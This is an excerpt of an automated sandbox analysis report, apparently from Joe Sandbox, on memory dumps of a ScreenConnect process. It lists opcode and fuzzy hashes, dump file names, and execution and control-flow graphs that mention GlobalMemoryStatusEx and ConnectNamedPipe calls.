                                                                                  • Instruction Fuzzy Hash: A6D0C726F6C91A0AA360662C90012A6A284DF582C0B4041BAE21DC22B6EC0CB8434381
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ec3f68cf3d204b9e1051c3e8b50fac01c8156db6722d6a58cfb454ee6c30d1e4
                                                                                  • Instruction ID: 5c0bcfb82d73564cbbcb91b05626eda2b463a77145eceecf4960898087172ee9
                                                                                  • Opcode Fuzzy Hash: ec3f68cf3d204b9e1051c3e8b50fac01c8156db6722d6a58cfb454ee6c30d1e4
                                                                                  • Instruction Fuzzy Hash: A0D05E13B9DA0A5FCB54AB3C55A25EC7644DF55200F840429EE29D2192DC6AAA008351
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7084c74c38e4754e5a634973d2323bc6c1eec0c228fa7d3d1e7262361337f9f0
                                                                                  • Instruction ID: 4657ada048238060b748c7b16174fe6b1d25f29a8be809af4dc4eb236e9f78a7
                                                                                  • Opcode Fuzzy Hash: 7084c74c38e4754e5a634973d2323bc6c1eec0c228fa7d3d1e7262361337f9f0
                                                                                  • Instruction Fuzzy Hash: ECD0C211A3CA4B0AE314EB3848014FE7197AF58200B809479812F820A2CC28B0048700
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 223f6d3c71c60681e043c4564f1081ef4bb471f97158aec7d9bd26cb8fdc1803
                                                                                  • Instruction ID: 93a6069514db574b502974c39e966df0c343415520f853c71b66b4905bd5787b
                                                                                  • Opcode Fuzzy Hash: 223f6d3c71c60681e043c4564f1081ef4bb471f97158aec7d9bd26cb8fdc1803
                                                                                  • Instruction Fuzzy Hash: 43C01211738E0E2BA6A8DE2C040636131C7FB9C28037A06B4960EC3291EC14E8020244
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 41c19f27cdc1e218893a164ccc8213aeac41fdbf40ae78f5fcc1680ab641f299
                                                                                  • Instruction ID: 921c98c2e0ec352a7e0e139eb895c790bc146468e50eb48a43f23c6b7e36844f
                                                                                  • Opcode Fuzzy Hash: 41c19f27cdc1e218893a164ccc8213aeac41fdbf40ae78f5fcc1680ab641f299
                                                                                  • Instruction Fuzzy Hash: A8C01221B2CE0A4AE368EF2C404027931D7AF98200B50467A911DC26A6CD38A5014784
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e3d7f174953eed367bd010120597e563527a765ec01872d920121a586975abad
                                                                                  • Instruction ID: 8525ff2f1fdde66a0d5cc741cc40c06e9276a0acea20c342d1a1189148e2f1fe
                                                                                  • Opcode Fuzzy Hash: e3d7f174953eed367bd010120597e563527a765ec01872d920121a586975abad
                                                                                  • Instruction Fuzzy Hash: D5C00260B089058FAA89FA68909CD6827D2DF6834234100A5B40ADB6B2DD64DC83C701
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5da5eff8d06a4e4977f151daab0a2e8d14bcd5dc1ca9f96b4d3a4d043a0612e2
                                                                                  • Instruction ID: 31d044a37aa7cc38bb9256c299858a7da0703272c530300dcdb266afbc294ae7
                                                                                  • Opcode Fuzzy Hash: 5da5eff8d06a4e4977f151daab0a2e8d14bcd5dc1ca9f96b4d3a4d043a0612e2
                                                                                  • Instruction Fuzzy Hash: 88B012237DE1190C7100204C38034F4F340C3420316011AB3D619400435C8F14930088
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c7559c13bf02bbc0b6889aa1e9ca45d8b796ccc6a74f11d1d320752045ff42c4
                                                                                  • Instruction ID: 362a5f584ca15ff722159e1cb52350ab301cb9f6e7be8274096f3811d5dae1b9
                                                                                  • Opcode Fuzzy Hash: c7559c13bf02bbc0b6889aa1e9ca45d8b796ccc6a74f11d1d320752045ff42c4
                                                                                  • Instruction Fuzzy Hash: A9D01221E6D10B4ADB74EE2D9C456E432D4B759320F855230F719C31A8E6AC50A48741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 40574501e9ce983e2c787d5a66fbe757c1192cd07908cb09ce731775866eef73
                                                                                  • Instruction ID: 35d4e22abb7ca5fabfa00ba579a0206684ebf603d73051a1ca4d031efbfa3201
                                                                                  • Opcode Fuzzy Hash: 40574501e9ce983e2c787d5a66fbe757c1192cd07908cb09ce731775866eef73
                                                                                  • Instruction Fuzzy Hash: AFC09B12E7DD1E4E63F5971C001577544C5A758351FA50175C91DD32E1CC0CED410244
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1eda8f26ba30a6cb0929a89212019eaac13bee6bf7611cb9c3a0e83bc5b50cdd
                                                                                  • Instruction ID: 590a8cebe39d8ba734e8d6c3a28fc87df26b847d3fc8b44cb851ea39b63de65d
                                                                                  • Opcode Fuzzy Hash: 1eda8f26ba30a6cb0929a89212019eaac13bee6bf7611cb9c3a0e83bc5b50cdd
                                                                                  • Instruction Fuzzy Hash: 66B0121172EE088AFB4C667D1C2A27D00C29FDC281F950038621DD37E3FC28CC030104
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3173710cecc94987c5d5d00bdedc63912f0dcedd52d75c10e291bf00509757a6
                                                                                  • Instruction ID: e814701a4b6378aed8b3bfc30db8ab361af736c15a4e6b4b023fcef6591a405a
                                                                                  • Opcode Fuzzy Hash: 3173710cecc94987c5d5d00bdedc63912f0dcedd52d75c10e291bf00509757a6
                                                                                  • Instruction Fuzzy Hash: 60C09B2175ED05CBEB4D7A7D181C13C54C5DB69741B500034931EF25F2FC189C031611
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e535c4dffd4dbe3fb52a0ec5ddaf5cd005afeb26ba60d6e6fcaa6e538d158b96
                                                                                  • Instruction ID: 5a1bdb605c5037d8a02cca856224c3ebd33c09a803eede34f27a2f219fccd092
                                                                                  • Opcode Fuzzy Hash: e535c4dffd4dbe3fb52a0ec5ddaf5cd005afeb26ba60d6e6fcaa6e538d158b96
                                                                                  • Instruction Fuzzy Hash: 0AB01210C66C0516DC0C7776EC864547290EB48200FC90464E40C832F3FF5E1CD5C245
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9c923d46ae3810c80368a9c4d636f7c528e1f0d6825605ee5c394459c5e4bd69
                                                                                  • Instruction ID: 58a97ec9f0f5164bbbb0a21c0d521fece466fc368955122aad0e06c0459bbc3c
                                                                                  • Opcode Fuzzy Hash: 9c923d46ae3810c80368a9c4d636f7c528e1f0d6825605ee5c394459c5e4bd69
                                                                                  • Instruction Fuzzy Hash: 4FC08C300045088FCBC4EE0480646A53392EBA4300B300028880DCB246CE31F842CBC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: de9c44510015c9d115b950adfbc86c1893a370054ac86a0f34d117997a51ed40
                                                                                  • Instruction ID: a1d9faa500b1668350718e72ddd154fc34bdd47c5fe0f656e40bdc7264ac0424
                                                                                  • Opcode Fuzzy Hash: de9c44510015c9d115b950adfbc86c1893a370054ac86a0f34d117997a51ed40
                                                                                  • Instruction Fuzzy Hash: 51B09221F19E0A8AD2B8EE69004427924D28B68201720127E811ED2AB2CD28A9464385
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a0200b5860782cfa7673e003de005211de4d802069a4f4f68ae3e0303103013f
                                                                                  • Instruction ID: 93e7520e751d250d7b0ed932c11cea5fb739876bcbc9fce05776de89e0d9243f
                                                                                  • Opcode Fuzzy Hash: a0200b5860782cfa7673e003de005211de4d802069a4f4f68ae3e0303103013f
                                                                                  • Instruction Fuzzy Hash: F3A02400F3C40C0557C0753C00DF13540C357541413114430117CC3155DC35F4010310
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2ca1cb59d163df800e9a5edabd92130eb3d19abaa0aae63e9756636213728cc8
                                                                                  • Instruction ID: b2d9dbea79cfcedd42296a92533da353bdf04f6644f87e710cbf42e1bbf2414d
                                                                                  • Opcode Fuzzy Hash: 2ca1cb59d163df800e9a5edabd92130eb3d19abaa0aae63e9756636213728cc8
                                                                                  • Instruction Fuzzy Hash: 74A0028176CB05167689A9AC20595B800C5975C2817504039B71DE22F3EC4898468255

                                                                                  Execution Graph

                                                                                  Execution Coverage:12.9%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:8
                                                                                  Total number of Limit Nodes:1
                                                                                  execution_graph 5100 7ffe7d0c8cf2 5104 7ffe7d0c8d0f 5100->5104 5101 7ffe7d0c8de2 5102 7ffe7d0c8e89 GlobalMemoryStatusEx 5103 7ffe7d0c8eb5 5102->5103 5104->5101 5104->5102 5105 7ffe7cdb3662 5106 7ffe7cdd61e0 ConnectNamedPipe 5105->5106 5108 7ffe7cdd6292 5106->5108

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 78 7ffe7d0c8cf2-7ffe7d0c8d28 80 7ffe7d0c8d2b 78->80 80->80 81 7ffe7d0c8d2d-7ffe7d0c8d48 80->81 83 7ffe7d0c8d4b 81->83 83->83 84 7ffe7d0c8d4d-7ffe7d0c8d5a 83->84 86 7ffe7d0c8d5c-7ffe7d0c8d85 84->86 87 7ffe7d0c8da4 84->87 89 7ffe7d0c8d87-7ffe7d0c8d8a 86->89 90 7ffe7d0c8dde 86->90 87->87 88 7ffe7d0c8da6-7ffe7d0c8db7 87->88 97 7ffe7d0c8e28-7ffe7d0c8e29 88->97 98 7ffe7d0c8db9-7ffe7d0c8dbd 88->98 93 7ffe7d0c8e0b-7ffe7d0c8e0f 89->93 94 7ffe7d0c8d8c-7ffe7d0c8d8e 89->94 91 7ffe7d0c8ddf 90->91 95 7ffe7d0c8e5b-7ffe7d0c8e5e 91->95 96 7ffe7d0c8de0 91->96 118 7ffe7d0c8e10 93->118 99 7ffe7d0c8e0a 94->99 100 7ffe7d0c8d90 94->100 101 7ffe7d0c8e61-7ffe7d0c8e87 95->101 96->101 102 7ffe7d0c8de1 96->102 103 7ffe7d0c8e2b 97->103 104 7ffe7d0c8e3f 97->104 105 7ffe7d0c8e3e 98->105 106 7ffe7d0c8dbf-7ffe7d0c8dc1 98->106 99->93 108 7ffe7d0c8d92-7ffe7d0c8d94 100->108 109 7ffe7d0c8dd3 100->109 111 7ffe7d0c8e89-7ffe7d0c8eb3 GlobalMemoryStatusEx 101->111 112 7ffe7d0c8de2-7ffe7d0c8e09 102->112 113 7ffe7d0c8e23-7ffe7d0c8e27 102->113 103->103 114 7ffe7d0c8e2d-7ffe7d0c8e3c 103->114 104->111 117 7ffe7d0c8e40-7ffe7d0c8e41 104->117 105->104 115 7ffe7d0c8e3d 106->115 116 7ffe7d0c8dc3-7ffe7d0c8dc7 106->116 108->118 121 7ffe7d0c8d96 108->121 119 7ffe7d0c8dd5 109->119 120 7ffe7d0c8e4f-7ffe7d0c8e53 109->120 125 7ffe7d0c8ebb-7ffe7d0c8ee2 111->125 126 7ffe7d0c8eb5 111->126 112->99 113->97 114->115 115->105 128 7ffe7d0c8dc9 116->128 129 7ffe7d0c8e43-7ffe7d0c8e48 116->129 117->129 130 7ffe7d0c8dd6-7ffe7d0c8dd7 119->130 131 7ffe7d0c8e17-7ffe7d0c8e19 119->131 124 7ffe7d0c8e55-7ffe7d0c8e5a 120->124 122 7ffe7d0c8d98-7ffe7d0c8d9a 121->122 123 7ffe7d0c8dd9 121->123 132 7ffe7d0c8d9c 122->132 133 7ffe7d0c8e16 122->133 123->124 134 7ffe7d0c8ddb-7ffe7d0c8ddd 123->134 124->95 126->125 128->93 138 7ffe7d0c8dcb-7ffe7d0c8dcd 128->138 139 7ffe7d0c8e49-7ffe7d0c8e4e 129->139 130->123 135 7ffe7d0c8e1b-7ffe7d0c8e1e 131->135 136 7ffe7d0c8e1f 131->136 132->91 140 7ffe7d0c8d9e-7ffe7d0c8da1 132->140 133->131 134->90 135->136 141 7ffe7d0c8e22 136->141 142 7ffe7d0c8e20-7ffe7d0c8e21 136->142 138->139 143 7ffe7d0c8dcf-7ffe7d0c8dd1 138->143 139->120 140->142 144 7ffe7d0c8da3 140->144 141->113 142->141 143->109 144->87
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1472924091.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 61017ab5c119ca06e6e83ed2f4ff03c44c3614afaed5865f39c191e2ef553e24
                                                                                  • Instruction ID: 5d1777f51f85599875e9cb2273bb2792fcb105195266543ef3c95e2b4f6f7153
                                                                                  • Opcode Fuzzy Hash: 61017ab5c119ca06e6e83ed2f4ff03c44c3614afaed5865f39c191e2ef553e24
                                                                                  • Instruction Fuzzy Hash: E281E632C1D6894FE779976888055F97FE2EF51320F0443BAD06DC75A3EB68780A8745

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 145 7ffe7cdb3662-7ffe7cdd6290 ConnectNamedPipe 149 7ffe7cdd6298-7ffe7cdd62e0 call 7ffe7cdd62e1 145->149 150 7ffe7cdd6292 145->150 150->149
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1467049333.00007FFE7CDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffe7cdb0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConnectNamedPipe
                                                                                  • String ID:
                                                                                  • API String ID: 2191148154-0
                                                                                  • Opcode ID: d3f33b25e4861f89d9bff8eaf15068c7359ecc1428c1a245bb99950c98b3b69c
                                                                                  • Instruction ID: 5fe4175d5ed04b188bcde0c9ad24f89e60849268e0f265f0123513bd2257dec0
                                                                                  • Opcode Fuzzy Hash: d3f33b25e4861f89d9bff8eaf15068c7359ecc1428c1a245bb99950c98b3b69c
                                                                                  • Instruction Fuzzy Hash: FE316F31D08A1C8FDB58EF98D849BEDB7F1FB94311F00826AD04DD7255DB70A8468B81